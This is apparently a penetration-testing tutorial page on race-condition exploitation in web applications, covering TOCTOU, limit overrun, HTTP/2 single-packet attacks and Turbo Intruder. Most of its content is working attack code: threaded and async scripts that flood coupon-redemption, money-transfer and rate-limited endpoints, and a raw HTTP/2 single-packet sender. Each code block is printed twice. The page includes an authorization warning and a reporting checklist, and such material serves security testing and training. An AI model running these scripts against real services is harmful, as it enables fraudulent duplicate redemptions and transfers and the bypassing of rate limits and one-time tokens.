Exploitation A04

Race Condition Exploitation

Race conditions occur when application behavior depends on the timing of events, allowing attackers to exploit the gap between checking a condition and using the result. These vulnerabilities can bypass security controls, duplicate transactions, or exceed rate limits.

Warning

Race conditions can cause financial loss, data corruption, or service disruption. Always test on authorized systems with proper safeguards. Consider testing during low-traffic periods to minimize impact.

๐Ÿ“š Quick Navigation

๐ŸŽฏ Fundamentals

โšก Attack Techniques

๐Ÿค– Automation

๐Ÿงช Practice

Understanding Race Conditions

A race condition exists when the correct behavior of a system depends on the sequence or timing of uncontrollable events. In web applications, this typically occurs when:

  • Multiple requests modify shared state without proper locking
  • A check and subsequent action aren't atomic operations
  • Database transactions lack appropriate isolation levels
  • Caching layers introduce timing inconsistencies

Common Race Condition Scenarios

๐Ÿ’ฐ Financial Operations

Transfer funds, redeem coupons, claim rewards multiple times by sending concurrent requests

๐ŸŽซ Inventory/Quota

Book the same seat, purchase limited items, or exceed API rate limits

๐Ÿ” Authentication

Bypass brute-force protections, reuse one-time tokens, or exploit session state

๐Ÿ“ File Operations

Exploit file write/read sequences, symlink attacks, or temp file vulnerabilities

Time-of-Check to Time-of-Use (TOCTOU)

TOCTOU is a specific race condition where a resource is checked for a condition, then used based on that check, but the resource's state changes between the check and use.

toctou-vulnerable.py
python
# TOCTOU Example: Coupon Redemption
# Vulnerable pseudo-code

def redeem_coupon(user_id, coupon_code):
    # CHECK: Is coupon still valid?
    coupon = db.query("SELECT * FROM coupons WHERE code = ?", coupon_code)
    
    if coupon.used:
        return "Coupon already used"
    
    if coupon.expired:
        return "Coupon expired"
    
    # RACE WINDOW: Another request could redeem between check and use
    
    # USE: Apply discount and mark as used
    apply_discount(user_id, coupon.value)
    db.execute("UPDATE coupons SET used = 1 WHERE code = ?", coupon_code)
    
    return "Coupon redeemed successfully"

# Attack: Send 10 concurrent requests with same coupon
# Result: Multiple requests pass the check before any marks it used
# TOCTOU Example: Coupon Redemption
# Vulnerable pseudo-code

def redeem_coupon(user_id, coupon_code):
    # CHECK: Is coupon still valid?
    coupon = db.query("SELECT * FROM coupons WHERE code = ?", coupon_code)
    
    if coupon.used:
        return "Coupon already used"
    
    if coupon.expired:
        return "Coupon expired"
    
    # RACE WINDOW: Another request could redeem between check and use
    
    # USE: Apply discount and mark as used
    apply_discount(user_id, coupon.value)
    db.execute("UPDATE coupons SET used = 1 WHERE code = ?", coupon_code)
    
    return "Coupon redeemed successfully"

# Attack: Send 10 concurrent requests with same coupon
# Result: Multiple requests pass the check before any marks it used

Information

The "race window" between CHECK and USE is often just milliseconds, but with enough concurrent requests, attackers can reliably exploit it. HTTP/2 single-packet attacks make this even more effective.

Detection Techniques

Look for these indicators when hunting for race conditions:

detection-checklist.txt
text
# Indicators of potential race conditions:

1. State-changing operations without transactions:
   - /api/transfer - Money transfers
   - /api/redeem - Coupon/gift card redemption
   - /api/vote - Voting systems
   - /api/like - Social media interactions

2. Rate-limited endpoints:
   - /api/generate - AI/content generation
   - /api/export - Data exports
   - /api/search - Search APIs

3. One-time-use tokens:
   - /reset-password?token=xxx
   - /verify-email?code=xxx
   - /invite/accept?token=xxx

4. Inventory operations:
   - /api/cart/checkout
   - /api/booking/reserve
   - /api/tickets/purchase

# Testing approach:
1. Identify state-changing endpoint
2. Capture the request in Burp
3. Send 10-50 concurrent requests using Turbo Intruder
4. Check if multiple succeeded when only one should have
# Indicators of potential race conditions:

1. State-changing operations without transactions:
   - /api/transfer - Money transfers
   - /api/redeem - Coupon/gift card redemption
   - /api/vote - Voting systems
   - /api/like - Social media interactions

2. Rate-limited endpoints:
   - /api/generate - AI/content generation
   - /api/export - Data exports
   - /api/search - Search APIs

3. One-time-use tokens:
   - /reset-password?token=xxx
   - /verify-email?code=xxx
   - /invite/accept?token=xxx

4. Inventory operations:
   - /api/cart/checkout
   - /api/booking/reserve
   - /api/tickets/purchase

# Testing approach:
1. Identify state-changing endpoint
2. Capture the request in Burp
3. Send 10-50 concurrent requests using Turbo Intruder
4. Check if multiple succeeded when only one should have

Limit Overrun Attacks

Limit overrun exploits the gap between checking a limit and updating the counter. If requests arrive simultaneously, multiple may pass the check before the limit is decremented.

limit-overrun.py
python
# Limit Overrun Race Condition
# Exploit insufficient locking on rate limits or quotas

# Scenario: API allows 5 free requests per day
# Attack: Send 10+ requests simultaneously before limit is checked/updated

import threading
import requests

results = []
lock = threading.Lock()

def make_request(i):
    r = requests.post("http://target.com/api/generate", 
                     json={"prompt": "test"})
    with lock:
        results.append((i, r.status_code, r.json().get('remaining', 'N/A')))
        print(f"Request {i}: {r.status_code} - Remaining: {r.json().get('remaining', 'N/A')}")

# Launch 10 threads simultaneously
threads = []
for i in range(10):
    t = threading.Thread(target=make_request, args=(i,))
    threads.append(t)

# Start all threads at once
for t in threads:
    t.start()

# Wait for completion
for t in threads:
    t.join()

# Check results - if more than 5 succeeded, race condition exists
successes = len([r for r in results if r[1] == 200])
print(f"\n[*] {successes} requests succeeded (limit was 5)")
# Limit Overrun Race Condition
# Exploit insufficient locking on rate limits or quotas

# Scenario: API allows 5 free requests per day
# Attack: Send 10+ requests simultaneously before limit is checked/updated

import threading
import requests

results = []
lock = threading.Lock()

def make_request(i):
    r = requests.post("http://target.com/api/generate", 
                     json={"prompt": "test"})
    with lock:
        results.append((i, r.status_code, r.json().get('remaining', 'N/A')))
        print(f"Request {i}: {r.status_code} - Remaining: {r.json().get('remaining', 'N/A')}")

# Launch 10 threads simultaneously
threads = []
for i in range(10):
    t = threading.Thread(target=make_request, args=(i,))
    threads.append(t)

# Start all threads at once
for t in threads:
    t.start()

# Wait for completion
for t in threads:
    t.join()

# Check results - if more than 5 succeeded, race condition exists
successes = len([r for r in results if r[1] == 200])
print(f"\n[*] {successes} requests succeeded (limit was 5)")

Single-Packet Attacks (HTTP/2)

HTTP/2 multiplexing allows multiple requests over a single connection. By carefully crafting packets, all requests can arrive at the server in a single TCP packet, achieving true simultaneous processing.

single-packet-attack.py
python
# Single-packet attack using HTTP/2
# All requests arrive simultaneously on the wire

import h2.connection
import h2.events
import socket
import ssl

def single_packet_attack(host, requests):
    """
    Send multiple HTTP/2 requests in a single TCP packet
    This achieves true simultaneous arrival at the server
    """
    ctx = ssl.create_default_context()
    ctx.set_alpn_protocols(['h2'])
    
    sock = socket.create_connection((host, 443))
    sock = ctx.wrap_socket(sock, server_hostname=host)
    
    conn = h2.connection.H2Connection()
    conn.initiate_connection()
    sock.sendall(conn.data_to_send())
    
    # Queue all requests without sending
    stream_ids = []
    for req in requests:
        stream_id = conn.get_next_available_stream_id()
        stream_ids.append(stream_id)
        
        headers = [
            (':method', 'POST'),
            (':path', req['path']),
            (':authority', host),
            (':scheme', 'https'),
            ('content-type', 'application/json'),
        ]
        conn.send_headers(stream_id, headers)
        conn.send_data(stream_id, req['body'].encode(), end_stream=True)
    
    # Send all requests in single packet
    sock.sendall(conn.data_to_send())
    
    # Collect responses
    responses = {}
    while len(responses) < len(requests):
        data = sock.recv(65535)
        events = conn.receive_data(data)
        for event in events:
            if isinstance(event, h2.events.DataReceived):
                responses[event.stream_id] = event.data
    
    return responses
# Single-packet attack using HTTP/2
# All requests arrive simultaneously on the wire

import h2.connection
import h2.events
import socket
import ssl

def single_packet_attack(host, requests):
    """
    Send multiple HTTP/2 requests in a single TCP packet
    This achieves true simultaneous arrival at the server
    """
    ctx = ssl.create_default_context()
    ctx.set_alpn_protocols(['h2'])
    
    sock = socket.create_connection((host, 443))
    sock = ctx.wrap_socket(sock, server_hostname=host)
    
    conn = h2.connection.H2Connection()
    conn.initiate_connection()
    sock.sendall(conn.data_to_send())
    
    # Queue all requests without sending
    stream_ids = []
    for req in requests:
        stream_id = conn.get_next_available_stream_id()
        stream_ids.append(stream_id)
        
        headers = [
            (':method', 'POST'),
            (':path', req['path']),
            (':authority', host),
            (':scheme', 'https'),
            ('content-type', 'application/json'),
        ]
        conn.send_headers(stream_id, headers)
        conn.send_data(stream_id, req['body'].encode(), end_stream=True)
    
    # Send all requests in single packet
    sock.sendall(conn.data_to_send())
    
    # Collect responses
    responses = {}
    while len(responses) < len(requests):
        data = sock.recv(65535)
        events = conn.receive_data(data)
        for event in events:
            if isinstance(event, h2.events.DataReceived):
                responses[event.stream_id] = event.data
    
    return responses

Tip

PortSwigger's research on "Smashing the state machine" demonstrates that single-packet attacks achieve a ~99.9% success rate on race conditions that require precise timing. Burp Suite 2023.9+ includes built-in single-packet attack support.

Turbo Intruder

Turbo Intruder is a Burp Suite extension designed for high-speed, precisely-timed attacks. It's the go-to tool for race condition testing.

race-condition.py
python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=30,
                          requestsPerConnection=100,
                          pipeline=False)
    
    # Send requests in parallel to trigger race condition
    for i in range(30):
        engine.queue(target.req, target.baseInput)

def handleResponse(req, interesting):
    if interesting:
        table.add(req)
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=30,
                          requestsPerConnection=100,
                          pipeline=False)
    
    # Send requests in parallel to trigger race condition
    for i in range(30):
        engine.queue(target.req, target.baseInput)

def handleResponse(req, interesting):
    if interesting:
        table.add(req)

Turbo Intruder Tips

  • Pipeline mode: Set pipeline=True for HTTP/1.1 pipelining (faster than concurrent connections)
  • Connection pooling: Adjust concurrentConnections based on server capacity
  • Request timing: Use engine.gate for synchronized release
  • Last-byte sync: Use race.py template for last-byte synchronization

Python Exploitation Scripts

race-exploit.py
python
#!/usr/bin/env python3
"""
Race Condition Exploitation Script
Sends concurrent requests to exploit TOCTOU vulnerabilities
"""
import asyncio
import aiohttp
import sys

TARGET = "http://target.com/api/redeem-coupon"
COOKIE = "session=abc123"
PAYLOAD = {"coupon_code": "DISCOUNT50"}

async def send_request(session, request_id):
    """Send a single request"""
    headers = {"Cookie": COOKIE, "Content-Type": "application/json"}
    try:
        async with session.post(TARGET, json=PAYLOAD, headers=headers) as resp:
            status = resp.status
            body = await resp.text()
            if "success" in body.lower() or status == 200:
                print(f"[+] Request {request_id}: SUCCESS - {status}")
                return True
            else:
                print(f"[-] Request {request_id}: Failed - {status}")
                return False
    except Exception as e:
        print(f"[!] Request {request_id}: Error - {e}")
        return False

async def race_attack(num_requests=20):
    """Launch concurrent requests"""
    print(f"[*] Launching {num_requests} concurrent requests...")
    
    connector = aiohttp.TCPConnector(limit=0, force_close=True)
    async with aiohttp.ClientSession(connector=connector) as session:
        # Create all tasks
        tasks = [send_request(session, i) for i in range(num_requests)]
        
        # Execute all at once
        results = await asyncio.gather(*tasks)
        
        successes = sum(results)
        print(f"\n[*] Results: {successes}/{num_requests} successful")

if __name__ == "__main__":
    num = int(sys.argv[1]) if len(sys.argv) > 1 else 20
    asyncio.run(race_attack(num))
#!/usr/bin/env python3
"""
Race Condition Exploitation Script
Sends concurrent requests to exploit TOCTOU vulnerabilities
"""
import asyncio
import aiohttp
import sys

TARGET = "http://target.com/api/redeem-coupon"
COOKIE = "session=abc123"
PAYLOAD = {"coupon_code": "DISCOUNT50"}

async def send_request(session, request_id):
    """Send a single request"""
    headers = {"Cookie": COOKIE, "Content-Type": "application/json"}
    try:
        async with session.post(TARGET, json=PAYLOAD, headers=headers) as resp:
            status = resp.status
            body = await resp.text()
            if "success" in body.lower() or status == 200:
                print(f"[+] Request {request_id}: SUCCESS - {status}")
                return True
            else:
                print(f"[-] Request {request_id}: Failed - {status}")
                return False
    except Exception as e:
        print(f"[!] Request {request_id}: Error - {e}")
        return False

async def race_attack(num_requests=20):
    """Launch concurrent requests"""
    print(f"[*] Launching {num_requests} concurrent requests...")
    
    connector = aiohttp.TCPConnector(limit=0, force_close=True)
    async with aiohttp.ClientSession(connector=connector) as session:
        # Create all tasks
        tasks = [send_request(session, i) for i in range(num_requests)]
        
        # Execute all at once
        results = await asyncio.gather(*tasks)
        
        successes = sum(results)
        print(f"\n[*] Results: {successes}/{num_requests} successful")

if __name__ == "__main__":
    num = int(sys.argv[1]) if len(sys.argv) > 1 else 20
    asyncio.run(race_attack(num))

Async Attack Patterns

async-patterns.py
python
# Alternative approaches for race condition attacks

# 1. Threading with barrier synchronization
import threading

barrier = threading.Barrier(10)  # Wait for 10 threads

def synchronized_request(i):
    # All threads wait here until 10 are ready
    barrier.wait()
    # Then all fire simultaneously
    requests.post(TARGET, json=PAYLOAD)

# 2. Multiprocessing for CPU-bound scenarios
from multiprocessing import Pool

def attack_request(i):
    return requests.post(TARGET, json=PAYLOAD)

with Pool(20) as p:
    results = p.map(attack_request, range(20))

# 3. Using grequests for gevent-based concurrency
import grequests

reqs = [grequests.post(TARGET, json=PAYLOAD) for _ in range(20)]
responses = grequests.map(reqs)  # All sent ~simultaneously

# 4. httpx for HTTP/2 support
import httpx

async def h2_race():
    async with httpx.AsyncClient(http2=True) as client:
        tasks = [client.post(TARGET, json=PAYLOAD) for _ in range(20)]
        responses = await asyncio.gather(*tasks)
# Alternative approaches for race condition attacks

# 1. Threading with barrier synchronization
import threading

barrier = threading.Barrier(10)  # Wait for 10 threads

def synchronized_request(i):
    # All threads wait here until 10 are ready
    barrier.wait()
    # Then all fire simultaneously
    requests.post(TARGET, json=PAYLOAD)

# 2. Multiprocessing for CPU-bound scenarios
from multiprocessing import Pool

def attack_request(i):
    return requests.post(TARGET, json=PAYLOAD)

with Pool(20) as p:
    results = p.map(attack_request, range(20))

# 3. Using grequests for gevent-based concurrency
import grequests

reqs = [grequests.post(TARGET, json=PAYLOAD) for _ in range(20)]
responses = grequests.map(reqs)  # All sent ~simultaneously

# 4. httpx for HTTP/2 support
import httpx

async def h2_race():
    async with httpx.AsyncClient(http2=True) as client:
        tasks = [client.post(TARGET, json=PAYLOAD) for _ in range(20)]
        responses = await asyncio.gather(*tasks)

Practice Labs

Testing Checklist

๐Ÿ” Identify Targets

  • โ˜ Money transfer endpoints
  • โ˜ Coupon/promo code redemption
  • โ˜ Rate-limited APIs
  • โ˜ One-time token endpoints
  • โ˜ Inventory/booking systems
  • โ˜ Vote/like functionality

โšก Test Approach

  • โ˜ Use Turbo Intruder with race.py
  • โ˜ Try HTTP/2 single-packet attacks
  • โ˜ Test with 10, 20, 50 concurrent requests
  • โ˜ Check response differences
  • โ˜ Verify state changes in database
  • โ˜ Test during various server loads

๐Ÿ“Š Verify Impact

  • โ˜ Did multiple requests succeed?
  • โ˜ Was the limit exceeded?
  • โ˜ Can you quantify financial impact?
  • โ˜ Is the race reproducible?

๐Ÿ“ Document

  • โ˜ Number of concurrent requests needed
  • โ˜ Success rate of exploitation
  • โ˜ Business impact (financial, data)
  • โ˜ Recommended mitigations